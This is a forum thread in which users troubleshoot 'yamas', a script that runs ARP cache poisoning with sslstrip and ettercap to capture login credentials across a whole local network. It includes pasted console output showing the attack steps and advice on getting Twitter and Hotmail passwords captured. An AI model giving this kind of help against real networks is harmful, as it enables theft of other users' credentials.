Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.
Re: Script for sniffing traffic.
Hi comaX. many thanks for this wonderful script. I have read through all 18 pages of comments and also had watched the video. I have downloaded and installed the script in my machine. Everything seems to run smooth however when I login to twitter / hotmail (I am manually typing the login / password) I do not get these captured. Please note that I have also use yamas -e option too. I am sure there is some settings in my machine which needs to be fixed but I just do not know which needs fixing.
My Machine:
BackTrack 5 R2 Gnome 64 bit : Linux bt 3.2.6 x86_64 GNU/Linux : HDD installed.
Note the messages as I launch yamas
Please note the interface and gateway ip are correct.Code:[+] Cleaning iptables [-] Cleaned. [+] Activating IP forwarding... [-] Activated. [+] Configuring iptables... To what port should the traffic be redirected to? (default = 8080) Port 8080 selected as default. From what port should the traffic be redirected to? (default = 80) Port 80 selected as default. Traffic from port 80 will be redirected to port 8080 [-] Traffic rerouted [+] Activating sslstrip... Choose filename to output : (default = yamas) Sslstrip will be listening on port 8080 and outputting log in /tmp/yamas.txt sslstrip 0.9 by Moxie Marlinspike running... [-] Sslstrip is running. [+] Activating ARP cache poisoning... Gateway : 192.168.1.1 Interface : wlan0 Enter IP gateway adress or press enter to use 192.168.1.1. 192.168.1.1 selected as default. What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0. wlan0 selected as default. We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D. Press enter to default. Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof [-] Arp cache poisoning is launched. Keep new window(s) running. Attack should be running smooth, enjoy. Attack is running. You can : 1. Rescan network. 2. Add a target (useless if targeting whole network). 3. Display ASCII correspondence table. 4. Real-time parsing... 5. Misc features. 6. Quit properly. Enter the number of the desired option.
Many thanks again.
Re: Script for sniffing traffic.
Try using mon0 after setting up wlan0 to run in monitor mode with airmon-ng.
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Script for sniffing traffic.
Hey thanks but how would being mon0 work. mon0 is to sniff traffic and it cannot associate with an AP. In order to sniff logins/passwords you need to be MITM and mon0 cannot do that.Originally Posted by ShadowMaster
Re: Script for sniffing traffic.
Since when can mon0 not associate with an AP? All monitor mode does is enable the ability to sniff raw packet frames from the ether. This is the first I ever heard about monitor mode decreasing functionality...
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Script for sniffing traffic.
Hi, thanks for reading it all before posting, even I wouldn't go this far. You say it doesn't work for hotmail / twitter. Does it work for others ? Have you tried in private browsing mode to avoid anything being transmitted via cookies for instance ? Did you make sure you were not on an https connection ? Some sites like gmail enforce this type of connection, rendering sslstrip/ettercap useless.
Since you're using ettercap, have you tried using sslstrip ?
As for the mon0/wlan0, it's not really relevant here. Indeed I don't think you can associate with an AP in monitor mode, but what you can do is being connected with wlan0 to an AP, and have a pseudo-interface mon0 in monitor mode. In a nutshell, mon0 itself doesn't connect, but the wireless interface can be connected, and in monitor mode.
But once again, I don't really see how that is relevant here, so unless you guys explain in more details, let's just forget that.
I have some more ideas, but more troubling too, so I'll wait for your feedback before conjecturing horrid stuff
//
I'll risk getting my ass kicked because it's absolutely irrelevant to Backtrack, but there is this project I started that needs help growing : http://msimdb.comax.fr It's a database of movie quotes in music. It suffers greatly from content and anything non-metal. So if you guys are willing to help in anyway you can think of, I'll be super glad ! Mods, sorry for doing this.
Last edited by comaX; 06-29-2012 at 04:59 AM.
Running both KDE and GNOME BT5 flawlessly. Thank you !
Re: Script for sniffing traffic.
BTW: I am running version 20120213
First of all I have tried both option with yamas, I mean the default is with sslstrip and with yamas -e (which activates ettercap). I now have used a browser with all cookies cleared. Have tried https and http authentication site.
Password box does not show me anything.
I am sure this script works as it's working with everyone else as it seems. Is there a debug option in this script. Help file does not say of there is any. Any idea will be appreciated.
@ShadowMaster
Now in regards to mon0 issue, what I meant that you cannot get ip address from an AP through mon0. Hence no gateway and this script is not going to work. Please correct me if I am wrong here.
Always willing to learn.
Regards
Re: Script for sniffing traffic.
@comaX Ideas are always welcome, no matter how troubling they may be.
@hannah Why not do what comaX said, which is what I meant, just in more detail. Basically associate with wlan0 and create a pseudo-interface mon0? Also, setting your own default gateway is really not hard... route gw {ip} or some thing very similar, don't remember off hand sorry. I'd be more worried about the no ip, which is also easy to set...
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Script for sniffing traffic.
The troubling idea would be that they changed the authentication process and I might have to change the parser, which was a pain in the arse back then, and now that I don't have everything in mind, I fear it would be again, with the necessity to first understand what I wrote back then... So yeah, it's troubling
@Hannah : you didn't tell me if it worked for other sites or not. Are you using a local connection page maybe ? (fr.msn.com ; us.msn.com... I just made them up, but you know what I mean)
Last edited by comaX; 06-29-2012 at 11:11 AM.
Running both KDE and GNOME BT5 flawlessly. Thank you !
Re: Script for sniffing traffic.
comaX, I know that fell bro. I am writing a perl script to help with ASM ghostwriting automation, and since I don't really know perl, and refuse to write it in py, I basically lost track of the number of times I've had to rewrite portions and figure out what I wanted to do with them. Incidentaly, anyone who knows perl and is willing to help would be amazing. I don't want to post it in the forums until its done though.
World Domination is such an ugly phrase. I prefer the term World Optimization.
Re: Script for sniffing traffic.
No so far it did not work for any other sites either. Yes I have tried sites like http://www.backtrack-linux.org/ as well which is not https. Anyway is there any config file (e.g; etter.conf ) I need to manually change or does your script do that automatically.
What I am thinking now to get sslstrip / ettercap manually working in my machine and then proceed.
@ShadowMaster: Will heed your advice.
Posting Permissions
